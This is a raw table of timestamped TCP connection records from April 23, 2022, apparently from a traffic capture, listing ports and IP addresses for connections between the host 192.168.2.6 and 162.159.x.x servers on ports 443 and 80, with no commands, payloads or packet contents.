                                                  Apr 23, 2022 08:14:59.461430073 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.461440086 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.461458921 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.461467981 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.461484909 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.461569071 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.473176003 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.473220110 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.473243952 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.473381996 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.473397970 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.473411083 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.473464966 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.473552942 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.478730917 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.478760958 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.478780985 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.478816032 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.478878975 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481209040 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481225967 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481241941 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481251955 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481303930 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481312037 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481323004 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481345892 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481352091 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481420040 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481427908 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481440067 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481451988 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481503963 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481511116 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481539011 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481545925 CEST44349723162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:59.481606960 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.481648922 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.483814001 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.491715908 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:59.512341976 CEST49723443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:05.822065115 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854275942 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854331970 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854367018 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854399920 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854433060 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854465961 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854496956 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854516983 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854554892 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854574919 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854598999 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854614019 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854623079 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854659081 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854686975 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854688883 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854696989 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854731083 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854733944 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854764938 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854794979 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854798079 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854805946 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854840994 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854849100 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854873896 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854897976 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854904890 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854939938 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854957104 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.854963064 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.854995012 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855025053 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855030060 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855041981 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855093956 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855098009 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855106115 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855139017 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855151892 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855176926 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855199099 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855201006 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855209112 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855247974 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855258942 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855267048 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855289936 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855293989 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855329037 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855349064 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855353117 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855360031 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855397940 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855410099 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855418921 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855444908 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855448961 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855479956 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855506897 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855513096 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.855547905 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.855581045 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.871660948 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871745110 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871820927 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871831894 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871845961 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.871874094 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871912003 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.871922016 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871954918 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.871963024 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.871993065 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872023106 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872030020 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872087002 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872092962 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872148037 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872155905 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872221947 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872229099 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872278929 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872286081 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872347116 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872354031 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872412920 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.872420073 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.872477055 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888446093 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888489962 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888525009 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888581991 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888644934 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888662100 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888684988 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888700008 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888703108 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888710976 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888751030 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888761044 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888807058 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888837099 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888854027 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888861895 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888875008 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888890982 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888906002 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888927937 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888935089 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.888952017 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.888983011 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889025927 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889033079 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889044046 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889072895 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889079094 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889094114 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889113903 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889152050 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889168024 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889173985 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889199018 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889209032 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889251947 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889259100 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889269114 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889312029 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889317989 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889391899 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889425039 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889437914 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889445066 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889478922 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889481068 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889488935 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889525890 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889539003 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889588118 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889619112 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889663935 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889672041 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889718056 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.889729023 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.889775991 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890006065 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890048027 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890065908 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890067101 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890075922 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890095949 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890124083 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890324116 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890347004 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890410900 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890418053 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890474081 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890479088 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890486002 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890507936 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890522003 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890552998 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890558958 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890721083 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890744925 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890782118 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.890789032 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.890836954 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.891110897 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891133070 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891200066 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.891210079 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891253948 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.891340017 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891360044 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891417027 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.891423941 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891577005 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891598940 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891953945 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.891961098 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.891968012 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.906744003 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.906768084 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.906929016 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.906956911 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.906980038 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907053947 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.907155037 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907172918 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907233000 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.907242060 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907284975 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.907332897 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907377005 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907402992 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.907411098 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907423019 CEST44349725162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:05.907434940 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:05.907463074 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:12.875931978 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:12.877116919 CEST49725443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.129718065 CEST4972680192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.145555019 CEST8049726162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.145678043 CEST4972680192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.148885012 CEST4972680192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.164669991 CEST8049726162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.173129082 CEST8049726162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.313477993 CEST4972680192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.348917007 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.348983049 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.349092960 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.352179050 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.352226973 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.372447968 CEST4972880192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.388395071 CEST8049728162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.388508081 CEST4972880192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.388786077 CEST4972880192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.389058113 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.389158010 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.393915892 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.394249916 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.404628038 CEST8049728162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.413662910 CEST8049728162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.417972088 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.458204031 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460474968 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460572004 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460628033 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460655928 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.460695028 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460752964 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.460753918 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460772991 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460825920 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.460840940 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460896969 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.460943937 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.460958004 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461009026 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461054087 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461056948 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461069107 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461113930 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461127043 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461165905 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461211920 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461220026 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461236000 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461283922 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461297989 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461349010 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461394072 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461397886 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461412907 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461456060 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461471081 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461529970 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461576939 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461580038 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461597919 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461642981 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461657047 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461720943 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461771011 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461786985 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461859941 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461910963 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461920977 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461935997 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.461980104 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.461992979 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462033987 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462081909 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.462083101 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462099075 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462157965 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.462188959 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462244034 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462290049 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462294102 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.462307930 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462367058 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.462368011 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462387085 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462465048 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462507963 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462639093 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.462656021 CEST44349727162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.462790012 CEST49727443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:18.476187944 CEST44349727162.159.129.233192.168.2.6
